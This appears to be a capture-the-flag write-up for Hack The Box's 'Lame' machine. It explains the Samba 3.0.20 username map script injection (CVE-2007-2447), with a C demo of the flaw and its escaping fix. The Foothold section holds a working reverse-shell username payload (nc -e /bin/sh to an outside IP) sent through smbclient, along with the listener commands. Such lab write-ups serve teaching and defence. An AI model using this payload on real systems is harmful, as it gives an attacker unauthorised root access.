
Lame

An end-of-life Samba 3.0.20 server with the 'username map script' option enabled passes the SMB logon username through a shell, so a username containing backticked shell metacharacters yields command execution as root (CVE-2007-2447) — one exploit lands a root shell and both flags.


Overview

Lame is an easy Linux machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

Machine Matrix

[Machine matrix radar chart; axes: Enumeration, Real-Life, CVE, Custom Exploitation, CTF-like]

The profile is fairly balanced — it leans CTF-like (6.2) and CVE (5.5), reflecting a box solved by a single named CVE (CVE-2007-2447 Samba username-map injection) along a short, guided path, with only moderate enumeration, custom work, and real-life realism around it.

Recon

| Port     | Service                  | Notes                                          |
|----------|--------------------------|------------------------------------------------|
| 21/tcp   | vsftpd 2.3.4             | anonymous login allowed; not the intended path |
| 22/tcp   | OpenSSH 4.7p1            | Debian 8ubuntu1                                |
| 139/tcp  | Samba smbd 3.X-4.X       | WORKGROUP                                      |
| 445/tcp  | Samba smbd 3.0.20-Debian | the intended path                              |
| 3632/tcp | distccd v1               | GNU 4.2.4                                      |

A two-stage scan — fast full-port sweep, then version/script scan on the open ports:

```bash
# stage 1: find every open TCP port; stage 2: version/script scan only those
ports=$(nmap -p- --min-rate=1000 -T4 10.129.11.167 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p"$ports" -sC -sV 10.129.11.167
```


A default scan (nmap's top 1000 TCP ports) finds four open ports: 21, 22, 139 and 445. The fifth service, distccd on 3632, sits outside the top 1000, which is exactly why the full -p- sweep above is needed to surface it. FTP on 21 is vsftpd 2.3.4; the standout is Samba smbd 3.0.20-Debian on 445, a long-EOL release.

Enumeration

Enumerate SMB. List the shares over a null session:

```bash
smbclient -N -L //10.129.11.167/
```


The null session (-N) is accepted, and the server banner in the output confirms the box is running Samba 3.0.20. That version is the way in; search it for a known exploit:

```bash
searchsploit "Samba 3.0.20"
```

This surfaces "Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution", which is CVE-2007-2447. That CVE is the rest of this box.

CVE-2007-2447

Before firing anything, it’s worth understanding why this works — so the exploit is a thing you reason about.

Samba can translate an incoming SMB username through an external program, configured in smb.conf:

```ini
[global]
   username map script = /etc/samba/scripts/mapuser.sh
```

Every time a client connects, smbd takes the username the client supplied and runs that script to resolve it to a real local account. The bug is in how it runs it. In Samba 3.0.20 the client-supplied username is pasted straight into a shell command line with no sanitisation — conceptually:

```c
/* simplified from smbd/map_username.c in Samba 3.0.x */
pstring command;
pstr_sprintf(command, "%s \"%s\"", username_map_script, client_username);
smbrun(command, &fd);   /* smbrun() executes the string via /bin/sh -c */
```

smbrun() hands the whole string to /bin/sh -c, so the shell parses it. The username sits inside double quotes, which neutralises ; and | but not command substitution: backticks and $( ) are still expanded inside double quotes, so whatever they contain is executed. There is no escaping and no allow-list. (The fix that shipped in 3.0.25 backslash-escapes the shell metacharacters in the username before the command line is built.)
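To make the mechanism concrete, here is an added example (my own code, not Samba's) that reproduces the vulnerable pattern from the simplified snippet above next to a hardened builder in the spirit of the 3.0.25 escaping fix, and runs both through /bin/sh -c via popen() the way smbrun() would. The stand-in map script (/bin/echo), the usernames and the function names are all made up for the demonstration, and the injected command is a harmless echo rather than a reverse shell.

```c
/* Added example, not Samba's code: the injection pattern behind CVE-2007-2447,
 * modelled on the page's simplified map_username() snippet, next to a hardened
 * builder. Script path, usernames and function names are made up. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* malloc'd copy of s (caller frees); avoids relying on strdup() being declared */
static char *dup_str(const char *s)
{
    size_t n = strlen(s) + 1;
    char *d = malloc(n);
    if (d) memcpy(d, s, n);
    return d;
}

/* Vulnerable pattern: the client-supplied username is pasted, unescaped, inside
 * the double-quoted argument of a command line that /bin/sh -c will parse.
 * Returns a malloc'd string; caller frees. */
char *build_map_cmd_vulnerable(const char *script, const char *user)
{
    size_t n = strlen(script) + strlen(user) + 4;   /* space, two quotes, NUL */
    char *cmd = malloc(n);
    if (cmd) snprintf(cmd, n, "%s \"%s\"", script, user);
    return cmd;
}

/* Hardened variant: backslash-escape every character that is still special to
 * the shell inside double quotes (` $ " \), so the username can only ever reach
 * the script as a literal argument. Same idea as the 3.0.25 escape-before-build fix. */
char *escape_shell_string(const char *user)
{
    char *out = malloc(2 * strlen(user) + 1);   /* worst case: every char escaped */
    char *p = out;
    if (!out) return NULL;
    for (; *user; user++) {
        if (strchr("`$\"\\", *user)) *p++ = '\\';
        *p++ = *user;
    }
    *p = '\0';
    return out;
}

char *build_map_cmd_hardened(const char *script, const char *user)
{
    char *safe = escape_shell_string(user);
    char *cmd = safe ? build_map_cmd_vulnerable(script, safe) : NULL;
    free(safe);
    return cmd;
}

/* Run a command line the way smbrun() does (via /bin/sh -c) and return the first
 * line of its stdout with the newline stripped. malloc'd; caller frees. */
char *run_first_line(const char *cmd)
{
    char buf[256] = {0};
    FILE *fp = popen(cmd, "r");
    if (!fp) return NULL;
    if (!fgets(buf, sizeof buf, fp)) buf[0] = '\0';
    pclose(fp);
    buf[strcspn(buf, "\n")] = '\0';
    return dup_str(buf);
}

int main(void)
{
    /* /bin/echo stands in for the map script: it prints the username it was handed.
     * The username carries a backticked command, like the page's ./=`nohup nc ...`
     * payload, but the injected command is a harmless echo. */
    const char *script = "/bin/echo";
    const char *user   = "./=`echo INJECTED`";

    char *v  = build_map_cmd_vulnerable(script, user);
    char *h  = build_map_cmd_hardened(script, user);
    char *vo = run_first_line(v);
    char *ho = run_first_line(h);
    printf("vulnerable: %s\n        -> %s\n", v, vo);   /* ./=INJECTED */
    printf("hardened:   %s\n        -> %s\n", h, ho);   /* ./=`echo INJECTED` */
    free(v); free(h); free(vo); free(ho);
    return 0;
}
```

Compile with cc and run: the vulnerable line prints ./=INJECTED because the shell expanded the backticks before echo ever saw its argument, while the hardened line prints the literal ./=`echo INJECTED`. Swap the harmless echo for the page's nohup nc payload and the first case is exactly what hands out a root shell on the real target.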

Two things make this devastating:

  1. It’s pre-auth. The username is read from the client before authentication succeeds — reachable through SMB session-setup and the MS-RPC SamrChangePassword call. No valid credentials are ever needed.
  2. smbd runs as root. Whatever the shell executes runs as root, so this one bug is simultaneously the foothold and the privesc.

So instead of supplying a name, we supply a command disguised as a name. The leading ./= (Metasploit uses /=) is an inert token that stays an ordinary word to the shell; the backticks after it carry the payload:

```bash
./=`nohup nc -e /bin/sh 10.10.16.13 4444`
```

smbd builds the command line <script> "./=`nohup nc -e /bin/sh 10.10.16.13 4444`" and hands it to /bin/sh, which evaluates the backticked command substitution before the map script itself runs. The reverse shell therefore fires as root, and the script only ever receives ./= plus whatever nc wrote to stdout (nothing).

What Metasploit’s usermap_script module does is exactly this and nothing more — it opens an SMB session and stuffs the same backticked payload into the username field. There’s no hidden machinery, which is why we can reproduce it by hand with smbclient and skip msfconsole entirely.

Foothold

No Metasploit needed. Start a listener, open an unauthenticated SMB session, and hand smbd a username whose backticked payload is your reverse shell.

```bash
# terminal 1: listener
nc -lnvp 4444
```

```bash
# terminal 2: deliver the malicious username over SMB
smbclient -N //10.129.11.167/tmp
# at the  smb: \>  prompt, type:
logon "./=`nohup nc -e /bin/sh 10.10.16.13 4444`"
# then press ENTER at the Password: prompt (leave it blank)
```

The listener catches a shell. Because smbd runs as root, the username injection executes in a root context — so exploiting CVE-2007-2447 returns a shell as root. Confirm and upgrade it:

```bash
id
# uid=0(root) gid=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
```


Flags

The foothold shell is already uid=0(root), so there is no privilege-escalation step; both flags read straight from here:

```bash
cat /home/makis/user.txt /root/root.txt
```

Full compromise: root on Lame from a single unauthenticated Samba exploit — no privilege escalation required.

This post is licensed under CC BY 4.0 by the author.